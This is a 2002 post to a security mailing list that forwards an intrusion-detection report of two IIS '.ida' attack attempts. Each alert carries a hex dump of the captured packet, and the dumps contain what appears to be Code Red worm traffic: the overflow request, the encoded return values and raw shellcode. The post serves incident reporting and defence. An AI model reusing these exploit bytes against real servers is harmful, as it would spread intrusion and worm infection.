[Dshield] Fw: ACID Incident Report

Jeramie Mesenbring jmesenbr at fastrodsrus.com
Mon May 6 22:53:03 GMT 2002


> Generated by ACID v0.9.6b20 on Mon May 06, 2002 16:48:42
>
> --------------------------------------------------------------------------
----
> #(2 - 6639) [2002-05-06 03:30:03] [arachNIDS/552] [CVE/CAN-2000-0071]
WEB-IIS ISAPI .ida attempt
> IPv4: 203.79.79.224 -> x.x.x.x
>       hlen=5 TOS=16 dlen=1504 ID=0 flags=0 offset=0 TTL=240 chksum=0
> TCP:  port=3118 -> dport: 80  flags=***AP*** seq=3460515509
>       ack=4039439018 off=5 res=0 win=8760 urp=0 chksum=0
> Payload:  length = 1349
>
> 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
> 010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
> 020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0f0 : 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   N...............
> 100 : C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25   .....x.. %u9090%
> 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
> 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
> 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
> 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
> 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
> 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
> 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
> 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
> 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
> 1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
> 1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
> 1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
> 1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
> 1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
> 1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
> 200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
> 210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
> 220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
> 230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
> 240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
> 250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
> 260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
> 270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
> 280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
> 290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
> 2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q<..X...3.f.
> 2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
> 2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B<..X....T.
> 2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
> 2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
> 2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
> 300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
> 310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
> 320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
> 330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
> 340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
> 350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
> 360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
> 370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
> 380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....<.GetP....
> 390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
> 3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
> 3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
> 3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
> 3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
> 3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
> 3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
> 400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
> 410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
> 420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
> 430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
> 440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
> 450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
> 460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
> 470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
> 480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
> 490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
> 4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
> 4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
> 4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
> 4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
> 4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
> 4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
> 500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
> 510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
> 520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
> 530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
> 540 : 68 8B 45 08 89                                    h.E..
> --------------------------------------------------------------------------
----
> #(2 - 6640) [2002-05-06 03:30:06] [arachNIDS/552] [CVE/CAN-2000-0071]
WEB-IIS ISAPI .ida attempt
> IPv4: 203.79.79.224 -> 12.239.131.194
>       hlen=5 TOS=0 dlen=1500 ID=42177 flags=0 offset=0 TTL=110
chksum=46713
> TCP:  port=3118 -> dport: 80  flags=***AP*** seq=4039437554
>       ack=3460515509 off=5 res=0 win=8760 urp=0 chksum=16933
> Payload:  length = 1345
>
> 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
> 010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
> 020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
> 0f0 : 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   N...............
> 100 : C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25   .....x.. %u9090%
> 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
> 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
> 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
> 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
> 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
> 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
> 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
> 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
> 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
> 1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
> 1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
> 1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
> 1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
> 1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
> 1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
> 200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
> 210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
> 220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
> 230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
> 240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
> 250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
> 260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
> 270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
> 280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
> 290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
> 2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q<..X...3.f.
> 2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
> 2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B<..X....T.
> 2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
> 2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
> 2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
> 300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
> 310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
> 320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
> 330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
> 340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
> 350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
> 360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
> 370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
> 380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....<.GetP....
> 390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
> 3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
> 3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
> 3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
> 3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
> 3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
> 3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
> 400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
> 410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
> 420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
> 430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
> 440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
> 450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
> 460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
> 470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
> 480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
> 490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
> 4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
> 4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
> 4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
> 4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
> 4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
> 4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
> 500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
> 510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
> 520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
> 530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
> 540 : 68                                                h
>
>




More information about the list mailing list